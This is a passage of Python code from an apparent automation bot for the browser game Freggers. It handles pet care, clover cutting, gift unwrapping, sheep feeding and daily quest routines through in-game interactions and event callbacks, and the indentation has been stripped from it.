self.send_item_interaction(wob_id, 'PONY_STRAWBERRY_MILK' if pony_drink else 'DRAGON_CHILI_FUEL')
elif hint == 'food_pony' or hint == 'food_dragon':
self.log('[PetCare] Pet needs food.')
pony_food = hint == 'food_pony'
food_name = self.localeItems.STRAWBERRY if pony_food else self.localeItems.CHILI
food_item = self.ensure_item_in_inv(food_name)
if not isinstance(food_item, dict): # 0 = not obtained, -1 = no free slot
if food_item == 0:
self.log('[PetCare] Collecting food \'{}\' 3 times...'.format(food_name))
food_source_name = 'tp_botanik.erdbeerstaude_horse' if pony_food else 'tp_botanik.chilistaude_dragon'
self.go_to_room('tp_botanik.fairy', False)
self.__e_room_loaded.wait()
food_source = self.find_item_by_gui(food_source_name)
search = ItemSearch(self, food_source.wob_id)
for _ in range(3):
search.search()
search.cleanup()
self.log('[PetCare] Collected food \'{}\' 3 times.'.format(food_name))
self.log('[PetCare] Going back to room {}.'.format(room))
self.go_to_room(room, exact)
self.__e_room_loaded.wait()
else:
self.log('[PetCare] Could not get food \'{}\' into inventory.'.format(food_name))
return False
self.send_item_interaction(wob_id, 'PONY_STRAWBERRY' if pony_food else 'DRAGON_CHILI')
self.log('[PetCare] Gave pet its food \'{}\'.'.format(food_name))
elif hint == 'flowers_dragon' or hint == 'flowers_pony':
pony_flowers = hint == 'flowers_pony'
flowers_name = self.localeItems.HORSE_FLOWER if pony_flowers else self.localeItems.DRAGON_FLOWER
flower = self.ensure_item_in_inv(flowers_name, 1976 if pony_flowers else 2399, 20)
if isinstance(flower, dict): # ensure_item_in_inv never returns None; 0 / -1 signal failure
self.log('[PetCare] Giving flowers \'{}\' to pet.'.format(flowers_name))
self.send_item_interaction(wob_id, 'PONY_FLOWERS' if pony_flowers else 'DRAGON_FLOWERS')
time.sleep(2.5)
else:
self.log('[PetCare] Could not get flower \'{}\'.'.format(flowers_name))
return False
elif hint == 'activator_dragon' or hint == 'activator_pony':
pony_activator = hint == 'activator_pony'
activator_name = self.localeItems.HORSESHOE if pony_activator else self.localeItems.DRAGON_TORCH
activator_gui = 'tp_botanik.hufeisen_horse' if pony_activator else 'tp_botanik.torch_dragon'
self.log('[PetCare] Pet needs activator \'{}\'.'.format(activator_name))
if not FreggersBot.contains(self.ajax_request_inventory(), lambda item: item != None and item['description'] == activator_name):
self.log('[PetCare] There is no \'{}\' in the inventory.'.format(activator_name))
if not self.ensure_empty_slots(1):
self.log('[PetCare] No inventory space available.')
return False
if self.pickup_any(activator_gui) == None:
self.log('[PetCare] Could not pickup a \'{}\' - buying a new one.'.format(activator_name))
self.ajax_buy_item(1978 if pony_activator else 2403, 20)
else:
self.log('[PetCare] Picked up a \'{}\'.'.format(activator_name))
self.log('[PetCare] Giving dragon torch to pet...')
self.send_item_interaction(wob_id, 'PONY_HORSE_SHOE' if pony_activator else 'DRAGON_TORCH')
time.sleep(2.5)
elif hint == 'magic_clover':
self.log('[PetCare] Pet needs clover effect.')
if not self.__care_pet_give_effect(wob_id, self.localeItems.EFFECT_CLOVER, 2164, 3):
return False
time.sleep(2.5)
elif hint == 'magic_DragonSymbols':
self.log('[PetCare] Pet needs dragon symbols effect.')
if not self.__care_pet_give_effect(wob_id, self.localeItems.EFFECT_SYMBOLS, 2774, 3):
return False
time.sleep(2.5)
elif hint == 'magic_glitter':
self.log('[PetCare] Pet needs glitter effect.')
if not self.__care_pet_give_effect(wob_id, self.localeItems.EFFECT_GLITTER, 2138, 1):
return False
time.sleep(2.5)
elif hint == 'magic_hearts':
self.log('[PetCare] Pet needs hearts effect.')
if not self.__care_pet_give_effect(wob_id, self.localeItems.EFFECT_HEARTS, 1977, 5):
return False
time.sleep(2.5)
elif hint == 'magic_stars':
self.log('[PetCare] Pet needs stars effect.')
if not self.__care_pet_give_effect(wob_id, self.localeItems.EFFECT_STARS, 2116, 3):
return False
time.sleep(2.5)
elif hint == 'magic_butterflies':
self.log('[PetCare] Pet needs butterflies effect.')
if not self.__care_pet_give_effect(wob_id, self.localeItems.EFFECT_BUTTERFLIES, 2242, 3):
return False
time.sleep(2.5)
elif hint == 'magic_snow':
self.log('[PetCare] Pet needs snowflakes effect.')
if not self.__care_pet_give_effect(wob_id, self.localeItems.EFFECT_SNOWFLAKES, 2198, 3):
return False
time.sleep(2.5)
elif hint == 'magic_Fire':
self.log('[PetCare] Pet needs fireball effect.')
if not self.__care_pet_give_effect(wob_id, self.localeItems.EFFECT_FIREBALL, 2632, 3):
return False
time.sleep(2.5)
else:
self.log('[PetCare] Unhandled hint:', hint)
self.log('Pet:', wob.gui, wob.name)
self.log('Pet interaction:', primary_interaction, wob.interactions)
self.log('Pet properties:', wob.get_properties())
time.sleep(2.5)
def go_to_home(self, room, exact):
self.go_to_room(room + '#@#' + str(self.user_id), exact)
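# Visit the player's own room and run __care_pet on every pet found there (matched via PET_GUI_PREFIXES).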
def care_pets(self, room, exact):
room += '#@#' + str(self.user_id)
self.go_to_room(room, exact)
self.__e_room_loaded.wait()
pets = []
for item in self.wob_registry.iso_items:
if item.gui.startswith('tp_botanik.'):
for pet_gui_prefix in FreggersBot.PET_GUI_PREFIXES:
if item.gui.startswith(pet_gui_prefix):
pets.append(item.wob_id)
break
self.log('[PetCare] Found {} pets.'.format(len(pets)))
for pet_wob_id in pets:
self.__care_pet(pet_wob_id, room, exact)
self.log('[PetCare] Took care of all pets in room {}.'.format(room))
def find_item_by_gui(self, gui):
for item in self.wob_registry.iso_items:
if item.gui == gui:
return item
return None
def find_items_by_gui(self, gui):
items = []
for item in self.wob_registry.iso_items:
if item.gui == gui:
items.append(item)
return items
def find_item_by_name(self, name):
for item in self.wob_registry.iso_items:
if item.name == name:
return item
return None
def find_items_by_name(self, name):
items = []
for item in self.wob_registry.iso_items:
if item.name == name:
items.append(item)
return items
def find_player_room(self, name):
if self.wob_registry.get_player_by_name(name) != None:
return ''
else:
req_profile = self._session.get(self.localeItems.URL + '/sidebar/profile/user/' + name)
if req_profile.status_code == 200:
text_profile = req_profile.text
loc_start = text_profile.find('gotoSpecifiedRoom(\'', text_profile.find('user-go-button'))
if loc_start != -1:
loc_start += 19
loc_end = text_profile.find('\'', loc_start)
loc = text_profile[loc_start:loc_end]
return loc
return None
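# Heuristically parse the badge sidebar HTML: a badge counts as completed when it shows no progress bar and its first requirement is marked achieved.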
def get_is_badge_completed(self, badge_id, badge_page = None):
if badge_page == None:
badge_page = self.get_badge_page()
if badge_page != None:
badge_start = badge_page.find('badge_id_' + str(badge_id) + '"')
if badge_start != -1:
i = badge_page.find('ba-requirement', badge_start)
return (badge_page.find('ba-progress-container', badge_start, badge_page.find('ba-badge-desc', badge_start)) == -1 and
badge_page.find('ba-requirement-achieved', i, badge_page.find('"', i)) != -1)
return None
def get_badge_page(self, user_id = None):
if user_id == None:
user_id = self.user_id
req_badges = self._session.get(self.localeItems.URL + '/sidebar/badge/user_badges?user_id=' + str(user_id))
if req_badges.status_code == 200:
return req_badges.text
return None
def get_badge_tasks(self, badge_id, user_id = None):
if user_id == None:
user_id = self.user_id
req_badge = self._session.get(self.localeItems.URL + '/sidebar/badge/user_badge_detail?badge_id={};user_id={}'.format(badge_id, user_id))
if req_badge.status_code == 200:
badge_info = req_badge.text
tasks = []
start = badge_info.find('ba-description')
i = badge_info.find('ba-requirement-todo', start)
while i != -1:
tasks.append((i, False))
i = badge_info.find('ba-requirement-todo', i + 19)
i = badge_info.find('ba-requirement-done', start)
while i != -1:
tasks.append((i, True))
i = badge_info.find('ba-requirement-done', i + 19)
result = []
for x in sorted(tasks, key = lambda x: x[0]):
result.append(x[1])
return result
return None
def get_has_fregger_check(self):
if self.__fregger_check != None:
return self.__fregger_check
else:
val = self.get_is_badge_completed(19)
self.__fregger_check = val
return val
def get_has_30_visitors_badge(self):
return self.get_is_badge_completed(13)
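# Cut clover in tp_botanik.azubi in batches of up to 8 (the hand-held capacity), emptying the hand-held into the press between batches.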
def cut_clover(self, amount):
self.log('[Cut Clover] Cutting {} clover...'.format(amount))
self.go_to_room('tp_botanik.azubi', False)
self.__e_room_loaded.wait()
self.__clover_count = 0
self.__clover_expect_event = 0
clover_cut_event = threading.Event()
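# __clover_expect_event: 1 = waiting for a CUT result, 2 = waiting for the press to clear the hand-held.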
def clover_cb_set_hand_held(data):
if self.__clover_expect_event == 1 and data['gui'] == 'tp_botanik.tp_botanik_klee':
self.__clover_expect_event = 0
self.__clover_count = data['count']
self.__clover_consumer_wob_id = data['consumer_wobids'][0]
self.log('[Cut Clover] {}/8'.format(self.__clover_count))
clover_cut_event.set()
def clover_cb_clear_hand_held():
if self.__clover_expect_event == 2:
self.__clover_expect_event = 0
self.__clover_count = 0
self.log('[Cut Clover] Put in press.')
clover_cut_event.set()
def clover_cb_show_action(data):
if self.__clover_expect_event == 1:
self.__clover_expect_event = 0
self.log('[Cut Clover] Clover not ready yet. Moving on...')
clover_cut_event.set()
self.register_callback(Event.SHOW_ACTION_FEEDBACK, clover_cb_show_action)
self.register_callback(Event.SET_HAND_HELD, clover_cb_set_hand_held)
self.register_callback(Event.CLEAR_HAND_HELD, clover_cb_clear_hand_held)
clovers = self.find_items_by_gui('tp_botanik.tp_botanik_klee')
for _ in range(math.ceil(amount / 8)):
remaining = min(8, amount)
amount -= remaining # the final batch only cuts what is still owed
while self.__clover_count < remaining:
clovers_copy = list(clovers)
for _ in range(len(clovers)):
clover = self.closest_iso_item(clovers_copy)
clovers_copy.remove(clover)
clover_cut_event.clear()
self.__clover_expect_event = 1
self.send_item_interaction(clover.wob_id, 'CUT')
clover_cut_event.wait()
self.wait_random_delay(0.3, 1.5)
if self.__clover_count >= remaining:
break
clover_cut_event.clear()
self.__clover_expect_event = 2
self.send_use_handheld_with(self.__clover_consumer_wob_id)
clover_cut_event.wait()
self.wait_random_delay(0.3, 2.5)
self.unregister_callback(Event.SHOW_ACTION_FEEDBACK, clover_cb_show_action)
self.unregister_callback(Event.SET_HAND_HELD, clover_cb_set_hand_held)
self.unregister_callback(Event.CLEAR_HAND_HELD, clover_cb_clear_hand_held)
del self.__clover_consumer_wob_id
del self.__clover_count
del self.__clover_expect_event
self.log('[Cut Clover] Done.')
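# Unwrap the tutorial gift crates in the apartment and place the unwrapped items at the fixed positions from unwrap_target_map.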
def unwrap_gifts(self, max_amount = 7):
guis = ['wutzlhofen.kiste_a_tutorial', 'wutzlhofen.kiste_b_tutorial', 'wutzlhofen.kiste_c_tutorial', 'wutzlhofen.kiste_d_tutorial', 'wutzlhofen.kiste_f_tutorial', 'wutzlhofen.kiste_h_tutorial']
unwrap_target_map = {
self.localeItems.GIFT_0: (49, 182, 47, 0),
self.localeItems.GIFT_1: (157, 208, 47, 6),
self.localeItems.GIFT_2: (21, 176, 47, 0),
self.localeItems.GIFT_3: (68, 149, 47, 6),
self.localeItems.GIFT_4: (152, 150, 47, 0),
self.localeItems.GIFT_5: (156, 228, 47, 0),
self.localeItems.GIFT_6: (28, 266, 47, 0),
self.localeItems.GIFT_7: (156, 228, 47, 0),
self.localeItems.GIFT_8: (68, 149, 47, 6),
self.localeItems.GIFT_9: (21, 278, 47, 0),
self.localeItems.GIFT_10: (157, 155, 47, 0)
}
self.log('[Unwrap Gifts] Unwrapping up to {} gift(s)...'.format(max_amount))
if not self.ensure_empty_slots(1):
self.log('[Unwrap Gifts] No inventory space available.')
return False
self.go_to_home(FreggersBot.AP_APARTMENT, False)
self.__e_room_loaded.wait()
unwrap_event = threading.Event()
place_event = threading.Event()
def unwrap_cb_notify_inv(data):
unwrap_event.set()
def unwrap_cb_env_stat(data):
if data['wobid'] == self.player.wob_id and data['status'] == Status.CARRYING and data['value'] == None:
place_event.set()
self.register_callback(Event.NOTIFY_INVENTORY, unwrap_cb_notify_inv)
self.register_callback(Event.ENV_STAT, unwrap_cb_env_stat)
count = 0
def place_objects():
for item in self.ajax_request_inventory():
if item != None and item['description'] in unwrap_target_map:
self.ajax_item_interact(item['id'], 'PLACE')
place_event.clear()
self.send_place_object(*unwrap_target_map[item['description']])
place_event.wait()
self.log('[Unwrap Gifts] Placed \'{}\'.'.format(item['description']))
for iso_item in list(self.wob_registry.iso_items):
if iso_item.gui in guis:
if count >= max_amount:
break
self.log('[Unwrap Gifts] Found gift {} - unwrapping...'.format(iso_item.gui))
unwrap_event.clear()
self.send_item_interaction(iso_item.wob_id, 'UNWRAP')
unwrap_event.wait()
place_objects()
count += 1
self.log('[Unwrap Gifts] {}/{}'.format(count, max_amount))
place_objects()
self.unregister_callback(Event.NOTIFY_INVENTORY, unwrap_cb_notify_inv)
self.unregister_callback(Event.ENV_STAT, unwrap_cb_env_stat)
self.log('[Unwrap Gifts] Unwrapped {}/{} gift(s).'.format(count, max_amount))
return count
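# Collect clover from the grass pile and feed every sheep in tp_botanik.azubi, in two passes.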
def feed_sheeps(self):
self.log('[Feed Sheeps] Giving clover to the sheep...')
self.go_to_room('tp_botanik.azubi', False)
self.__e_room_loaded.wait()
self.__feedsheeps_expect_event = 0
feed_event = threading.Event()
weed_source = self.find_item_by_gui('tp_botanik.grashaufen')
sheeps = self.find_items_by_gui('tp_botanik.schaf')
def feed_sheeps_cb_set_hand_held(data):
if self.__feedsheeps_expect_event == 1 and data['gui'] == 'tp_botanik.powerriegel':
self.__feedsheeps_expect_event = 0
feed_event.set()
self.log('[Feed Sheeps] Collected {}x clover.'.format(data['count']))
def feed_sheeps_cb_update_wob(data):
if self.__feedsheeps_expect_event == 2 and data.effect != None and data.effect.gui == 'dotsflowup':
self.__feedsheeps_expect_event = 0
feed_event.set()
self.log('[Feed Sheeps] Fed sheep.')
self.register_callback(Event.SET_HAND_HELD, feed_sheeps_cb_set_hand_held)
self.register_callback(Event.ACTION_UPDATE_WOB, feed_sheeps_cb_update_wob)
self.__feedsheeps_expect_event = 1
self.send_item_interaction(weed_source.wob_id, 'TAKE_POWERRIEGEL')
feed_event.wait()
sheeps = self.sort_iso_items_by_distance(sheeps)
self.wait_random_delay(0.5, 2.5)
for x in range(2):
for sheep in sheeps:
feed_event.clear()
self.__feedsheeps_expect_event = 2
self.send_use_handheld_with(sheep.wob_id)
feed_event.wait()
self.wait_random_delay(0.5, 2)
if x == 0:
self.wait_random_delay(3.7, 4)
self.wait_random_delay(0.5, 3)
self.unregister_callback(Event.SET_HAND_HELD, feed_sheeps_cb_set_hand_held)
self.unregister_callback(Event.ACTION_UPDATE_WOB, feed_sheeps_cb_update_wob)
del self.__feedsheeps_expect_event
self.log('[Feed Sheeps] Done.')
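# Dispatch on the current quest label and perform the matching routine; tutorial quests chain into complete_quest() again for the follow-up quest.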
def complete_quest(self):
quest = self.quest
if quest != None:
self.__e_quest_done.clear()
self.log('[Quest] Completing quest \'{}\'...'.format(quest))
if quest == 'DAILY_SEASON_EASTER_DELIVER_EGGS':
eggs_in_inv = self.filter_items(self.ajax_request_inventory(), self.localeItems.EASTER_EGGS)
if len(eggs_in_inv) == 0 and not self.ensure_empty_slots(1):
self.log('[Quest] No inventory space available.')
return False
eggs_in_queue = None
eggs_count = 0
for egg_slot in eggs_in_inv:
eggs_count += egg_slot['count']
if eggs_count < 10:
eggs_in_queue = self.filter_items(self.ajax_request_item_queue(), self.localeItems.EASTER_EGGS)
missing_eggs = 10 - eggs_count - len(eggs_in_queue)
if missing_eggs > 0:
self.log('[Quest] Collecting {} easter eggs.'.format(missing_eggs))
self.collect_eggs(max_amount = missing_eggs)
eggs_in_queue = self.filter_items(self.ajax_request_item_queue(), self.localeItems.EASTER_EGGS)
eggs_in_inv = self.filter_items(self.ajax_request_inventory(), self.localeItems.EASTER_EGGS)
self.go_to_room('wutzlhofen.park', False)
self.__e_room_loaded.wait()
target = self.find_item_by_gui('tp_botanik.monstereasterbasket')
if target == None:
self.log('[Quest] Could not find the monster easter basket.')
return False
for _ in range(10):
egg = None
if len(eggs_in_inv) == 0:
egg = eggs_in_queue.pop(0)
self.ajax_inbox_action(egg['id'], Freggers.INBOX_ACTION_ACCEPT)
self.log('[Quest] Accepted egg from queue.')
else:
egg = eggs_in_inv[0]
if egg['count'] == 1:
del eggs_in_inv[0]
else:
egg['count'] -= 1
self.ajax_item_usewith(egg['id'], target.wob_id)
self.log('[Quest] Threw egg into the monster easter basket.')
self.wait_random_delay(0.5, 2.5)
self.__e_quest_done.wait()
self.log('[Quest] Completed.')
return True
elif quest == 'TUTORIAL_UNWRAP_ALL_BOXES': #2
self.log('[Quest] Unwrapping a gift in the apartment...')
if self.unwrap_gifts(max_amount = 1) == 0:
self.log('[Quest] Could not unwrap a gift.')
return False
self.__e_quest_done.wait()
self.log('[Quest] Completed. Completing next...')
return self.complete_quest()
elif quest == 'TUTORIAL_UNWRAP_AND_PLACE' or quest == 'TUTORIAL_PLACE_ALL_ITEMS': #3
self.log('[Quest] Unwrapping and placing all gifts in the apartment...')
self.unwrap_gifts(max_amount = 6)
if not self.__e_quest_done.wait(3):
inv = self.ajax_request_inventory()
slot_count = len(inv)
if not self.ensure_empty_slots(slot_count - 3, inv = inv):
self.log('[Quest] No inventory space available.')
return False
for item in inv:
if item != None:
item_menu = self.ajax_item_menu(item['id'], 'display')
self.debug('Item menu:', item_menu)
break
self.__e_quest_done.wait()
self.log('[Quest] Completed. Completing next...')
return self.complete_quest()
elif quest == 'TUTORIAL_DELIVER_CLOVER': #4
self.cut_clover(amount = 6)
self.__e_quest_done.wait()
self.log('[Quest] Completed. Completing next...')
return self.complete_quest()
elif quest == 'TUTORIAL_FIND_EIGENHEIM': #1
self.log('[Quest] Going to apartment...')
self.go_to_home(FreggersBot.AP_APARTMENT, False)
self.__e_quest_done.wait()
self.log('[Quest] Completed. Completing next...')
return self.complete_quest()
elif quest == 'TUTORIAL_FEED_THE_SHEEP': #5
self.log('[Quest] Feeding 6 sheep...')
self.feed_sheeps()
self.__e_quest_done.wait()
self.log('[Quest] Completed. Completing next...')
return self.complete_quest()
elif quest == 'TUTORIAL_COLLECT_FIRST_INGREDIENT': #6
self.log('[Quest] Collecting wood...')
self.go_to_room('tp_botanik.azubi', False)
self.__e_room_loaded.wait()
wood_source = self.find_item_by_gui('western.stumpfmitbeil_dispenser')
self.send_item_interaction(wood_source.wob_id, 'SEARCH')
self.__e_quest_done.wait()
self.log('[Quest] Completed. Completing next...')
return self.complete_quest()
elif quest == 'TUTORIAL_CRAFT_ITEM': #7
self.log('[Quest] Crafting item...')
wood_in_inv = self.filter_item(self.ajax_request_inventory(), self.localeItems.WOOD)
if len(wood_in_inv) == 0:
if not self.ensure_empty_slots(1):
self.log('[Quest] No inventory space available.')
return False
wood_in_queue = self.filter_item(self.ajax_request_item_queue(), self.localeItems.WOOD)
if len(wood_in_queue) == 0:
self.log('[Quest] Collecting wood...')
self.go_to_room('tp_botanik.azubi', False)
self.__e_room_loaded.wait()
wood_source = self.find_item_by_gui('western.stumpfmitbeil_dispenser')
self.send_item_interaction(wood_source.wob_id, 'SEARCH')
self.__e_quest_done.wait()
else:
self.log('[Quest] Accepting wood from item queue...')
self.ajax_inbox_action(wood_in_queue[0]['id'], Freggers.INBOX_ACTION_ACCEPT)
self.craft_item(20, 8, 0)
self.__e_quest_done.wait()
self.log('[Quest] Completed. Completing next...')
return self.complete_quest()
elif quest == 'TUTORIAL_UNLOCK_CRAFTING_CATEGORY': #8
self.log('[Quest] Unlocking crafting category...')
self.__e_level_data.wait()
if self.level_data['level'] == 1:
self.collect_ants(max_amount = 3)
self.deliver_ants(amount = 3)
self.unlock_crafting_category(25)
self.__e_quest_done.wait()
self.log('[Quest] Completed.')
return self.complete_quest()
elif quest == 'DAILY_DELIVER_SNAILS':
self.log('[Quest] Collecting 3 snails...')
self.go_to_room('tp_botanik.azubi', False)
self.__e_room_loaded.wait()
self.__snail_count = 0
self.__snail_consumer_wob_id = None
snail_pickup_event = threading.Event()
def snail_cb_set_hand_held(data):
if data['gui'] == 'tp_botanik.eimerschnecken':
self.__snail_count = data['count']
self.__snail_consumer_wob_id = data['consumer_wobids'][0]
self.log('[Quest] Snail picked up ({}/4).'.format(self.__snail_count))
snail_pickup_event.set()
self.register_callback(Event.SET_HAND_HELD, snail_cb_set_hand_held)
snail_guis = ['tp_botanik.schneckegelb', 'tp_botanik.schneckerot', 'tp_botanik.schneckelila', 'tp_botanik.schneckeblau']
while self.__snail_count < 4:
for iso_item in list(self.wob_registry.iso_items):
if iso_item.gui in snail_guis:
snail_pickup_event.clear()
self.send_item_interaction(iso_item.wob_id, 'FILL_BUCKET')
snail_pickup_event.wait()
if self.__snail_count >= 4:
break
time.sleep(0.1)
self.log('[Quest] Picked up {} snails. Delivering...'.format(self.__snail_count))
self.send_use_handheld_with(self.__snail_consumer_wob_id)
self.__e_quest_done.wait()
self.unregister_callback(Event.SET_HAND_HELD, snail_cb_set_hand_held)
del self.__snail_count
del self.__snail_consumer_wob_id
self.log('[Quest] Completed.')
return True
elif quest == 'DAILY_RETURN_EMPTY_BOTTLES':
self.log('[Quest] Collecting 3 empty bottles...')
self.collect_bottles(max_amount = 3)
if self.return_bottles(amount = 3, beer_crates = False) == 3:
self.__e_quest_done.wait()
self.log('[Quest] Completed.')
return True
self.log('[Quest] Could not return 3 empty bottles.')
return False
elif quest == 'DAILY_DELIVER_DUNG':
self.log('[Quest] Delivering 8 buckets of dung to the composter...')
self.go_to_room('tp_botanik.azubi', False)
self.__e_room_loaded.wait()
self.__dung_count = 0
self.__dung_consumer_wob_id = None
self.__dung_expect_event = 0
self.__dung_success = False
self.__dung_sheep_wob_id = None
self.__dung_sheep_state = 0
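            # State legend for __dung_expect_event (derived from the callbacks below):
            #   1 = filling the bucket at a toilet, 2 = petting a sheep (outcome read
            #   from its effect/animation), 3 = taking clover, 4 = feeding a sheep,
            #   5 = clearing the hand-held item.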
dung_event = threading.Event()
def dung_cb_set_hand_held(data):
if self.__dung_expect_event == 1 and data['gui'] == 'tp_botanik.eimerkacke':
self.__dung_expect_event = 0
self.__dung_count = data['count']
self.__dung_consumer_wob_id = data['consumer_wobids'][0]
self.log('[Quest] Dung collected ({}/4).'.format(self.__dung_count))
dung_event.set()
elif self.__dung_expect_event == 3 and data['gui'] == 'tp_botanik.powerriegel':
self.__dung_expect_event = 0
dung_event.set()
self.log('[Quest] Collected clover ({}) to feed sheep.'.format(data['count']))
def dung_cb_show_action(data):
if self.__dung_expect_event == 1:
self.__dung_expect_event = 0
self.__dung_success = False
dung_event.set()
def dung_cb_update_wob(data):
if self.__dung_expect_event == 2:
if data.effect != None:
if data.effect.gui == 'poof':
self.__dung_expect_event = 0
self.__dung_sheep_state = 1
dung_event.set()
elif data.animation != None:
if data.animation.name == 'happy':
self.__dung_expect_event = 0
self.__dung_sheep_state = 2
dung_event.set()
elif data.animation.name == 'needtopee':
self.__dung_expect_event = 0
self.__dung_sheep_state = 3
dung_event.set()
elif self.__dung_expect_event == 4:
if data.effect != None:
if data.effect.gui == 'dotsflowup':
self.__dung_expect_event = 0
dung_event.set()
def dung_cb_clear_hand_held():
if self.__dung_expect_event == 5:
self.__dung_expect_event = 0
dung_event.set()
self.register_callback(Event.SET_HAND_HELD, dung_cb_set_hand_held)
self.register_callback(Event.SHOW_ACTION_FEEDBACK, dung_cb_show_action)
self.register_callback(Event.ACTION_UPDATE_WOB, dung_cb_update_wob)
self.register_callback(Event.CLEAR_HAND_HELD, dung_cb_clear_hand_held)
toilets = self.find_items_by_gui('tp_botanik.dixieklo')
sheeps = self.find_items_by_gui('tp_botanik.schaf')
weed_source = self.find_item_by_gui('tp_botanik.grashaufen')
for _ in range(2):
while self.__dung_count < 4:
for sheep in sheeps:
self.log('[Quest] Petting sheep...')
dung_event.clear()
self.__dung_sheep_state = 0
self.__dung_expect_event = 2
self.send_item_interaction(sheep.wob_id, 'PAT')
dung_event.wait()
if self.__dung_sheep_state == 2:
                            self.log('[Quest] Feeding sheep before retrying to pet...')
dung_event.clear()
self.__dung_expect_event = 3
self.send_item_interaction(weed_source.wob_id, 'TAKE_POWERRIEGEL')
dung_event.wait()
                            self.log('[Quest] Giving clover to sheep...')
for s in sheeps:
dung_event.clear()
self.__dung_expect_event = 4
self.send_use_handheld_with(s.wob_id)
dung_event.wait()
self.send_clear_handheld()
dung_event.clear()
self.__dung_expect_event = 2
self.send_item_interaction(sheep.wob_id, 'PAT')
dung_event.wait()
for toilet in toilets:
self.log('[Quest] Collecting dung from toilet...')
dung_event.clear()
self.__dung_expect_event = 1
self.send_item_interaction(toilet.wob_id, 'FILL_BUCKET')
dung_event.wait()
if self.__dung_count >= 4:
break
self.log('[Quest] Bringing dung to the compost...')
dung_event.clear()
self.__dung_expect_event = 5
self.send_use_handheld_with(self.__dung_consumer_wob_id)
dung_event.wait()
self.__dung_count = 0
self.log('[Quest] Dung is in compost.')
self.unregister_callback(Event.SET_HAND_HELD, dung_cb_set_hand_held)
self.unregister_callback(Event.SHOW_ACTION_FEEDBACK, dung_cb_show_action)
self.unregister_callback(Event.ACTION_UPDATE_WOB, dung_cb_update_wob)
self.unregister_callback(Event.CLEAR_HAND_HELD, dung_cb_clear_hand_held)
del self.__dung_count
del self.__dung_consumer_wob_id
del self.__dung_expect_event
del self.__dung_success
del self.__dung_sheep_wob_id
del self.__dung_sheep_state
self.__e_quest_done.wait()
self.log('[Quest] Completed.')
return True
elif quest == 'DAILY_WATER_THE_PLANTS':
self.log('[Quest] Watering 6 exotic plants...')
self.go_to_room('tp_botanik.azubi', False)
self.__e_room_loaded.wait()
water_source = self.find_item_by_gui('tp_botanik.trog')
watering_event = threading.Event()
self.__watering_pump_success = False
self.__watering_expect_event = 0
self.__water_count = 0
self.__watering_target_wob_ids = None
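            # State legend for __watering_expect_event (derived from the callbacks below):
            #   1 = pumping water (ends on a 'dotsflowup' effect or the ENOUGH_WATER
            #   feedback), 2 = filling the watering can, 3 = watering a plant.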
def watering_cb_show_action(data):
if self.__watering_expect_event == 1 and data == self.localeItems.ENOUGH_WATER:
self.__watering_expect_event = 0
watering_event.set()
def watering_cb_update_wob(data):
if (self.__watering_expect_event == 1 or self.__watering_expect_event == 3) and data.effect != None and data.effect.gui == 'dotsflowup':
self.__watering_expect_event = 0
self.__watering_pump_success = True
watering_event.set()
def watering_cb_set_hand_held(data):
if self.__watering_expect_event == 2 and data['gui'] == 'tp_botanik.giesskanne':
self.__watering_expect_event = 0
if self.__watering_target_wob_ids == None:
self.__watering_target_wob_ids = data['consumer_wobids']
self.__water_count = data['count']
self.log('[Quest] Collected water ({}/3).'.format(self.__water_count))
watering_event.set()
self.register_callback(Event.SHOW_ACTION_FEEDBACK, watering_cb_show_action)
self.register_callback(Event.ACTION_UPDATE_WOB, watering_cb_update_wob)
self.register_callback(Event.SET_HAND_HELD, watering_cb_set_hand_held)
for _ in range(2):
while self.__water_count < 3:
self.__watering_expect_event = 1
watering_event.clear()
self.send_item_interaction(water_source.wob_id, 'PUMP')
watering_event.wait()
self.wait_random_delay(2.1, 3.5)
if self.__watering_pump_success:
watering_event.clear()
self.__watering_expect_event = 1
self.send_item_interaction(water_source.wob_id, 'PUMP')
watering_event.wait()
self.wait_random_delay(2.1, 3.5)
watering_event.clear()
self.__watering_expect_event = 2
self.send_item_interaction(water_source.wob_id, 'TAKE_WATER')
watering_event.wait()
self.wait_random_delay(0.3, 2.5)
for _ in range(self.__water_count):
plant_wob_id = self.__watering_target_wob_ids.pop(random.randint(0, len(self.__watering_target_wob_ids) - 1))
self.log('[Quest] Watering exotic plant...')
watering_event.clear()
self.__watering_expect_event = 3
self.send_use_handheld_with(plant_wob_id)
watering_event.wait()
self.log('[Quest] Watered exotic plant.')
self.wait_random_delay(0.3, 1.5)
self.__water_count = 0
self.unregister_callback(Event.SHOW_ACTION_FEEDBACK, watering_cb_show_action)
self.unregister_callback(Event.ACTION_UPDATE_WOB, watering_cb_update_wob)
self.unregister_callback(Event.SET_HAND_HELD, watering_cb_set_hand_held)
del self.__watering_pump_success
del self.__watering_expect_event
del self.__water_count
del self.__watering_target_wob_ids
self.__e_quest_done.wait()
self.log('[Quest] Completed.')
return True
elif quest == 'DAILY_DELIVER_FERTILIZER':
self.log('[Quest] Delivering fertilizer to 6 exotic plants...')
self.go_to_room('tp_botanik.azubi', False)
self.__e_room_loaded.wait()
fertilizer_source = self.find_item_by_gui('tp_botanik.komposthaufen')
fertilize_event = threading.Event()
self.__fertilize_expect_event = 0
self.__fertilizer_count = 0
self.__fertilizer_target_wob_ids = None
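            # State legend for __fertilize_expect_event: 1 = taking fertilizer from the
            # compost heap, 2 = applying it to a plant (signalled by the timer bar).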
def fertilize_cb_set_handheld(data):
if self.__fertilize_expect_event == 1 and data['gui'] == 'tp_botanik.dungersack':
self.__fertilize_expect_event = 0
self.__fertilizer_count = data['count']
if self.__fertilizer_target_wob_ids == None:
self.__fertilizer_target_wob_ids = data['consumer_wobids']
fertilize_event.set()
def fertilize_cb_timer_bar(data):
if self.__fertilize_expect_event == 2:
self.__fertilize_expect_event = 0
fertilize_event.set()
print(data)
self.register_callback(Event.SHOW_TIMER_BAR, fertilize_cb_timer_bar)
self.register_callback(Event.SET_HAND_HELD, fertilize_cb_set_handheld)
for _ in range(2):
while self.__fertilizer_count < 4:
self.__fertilize_expect_event = 1
fertilize_event.clear()
self.send_item_interaction(fertilizer_source.wob_id, 'TAKE_DUENGER') #Timerbar: 800
fertilize_event.wait()
self.wait_random_delay(0.8, 2)
for _ in range(self.__fertilizer_count):
plant_wob_id = self.__fertilizer_target_wob_ids.pop(random.randint(0, len(self.__fertilizer_target_wob_ids) - 1))
self.log('[Quest] Giving fertilizer to exotic plant...')
fertilize_event.clear()
self.__fertilize_expect_event = 2
self.send_use_handheld_with(plant_wob_id) #Timerbar: 1600
fertilize_event.wait()
self.log('[Quest] Gave fertilizer to exotic plant.')
self.wait_random_delay(1.6, 3)
self.__fertilizer_count = 0
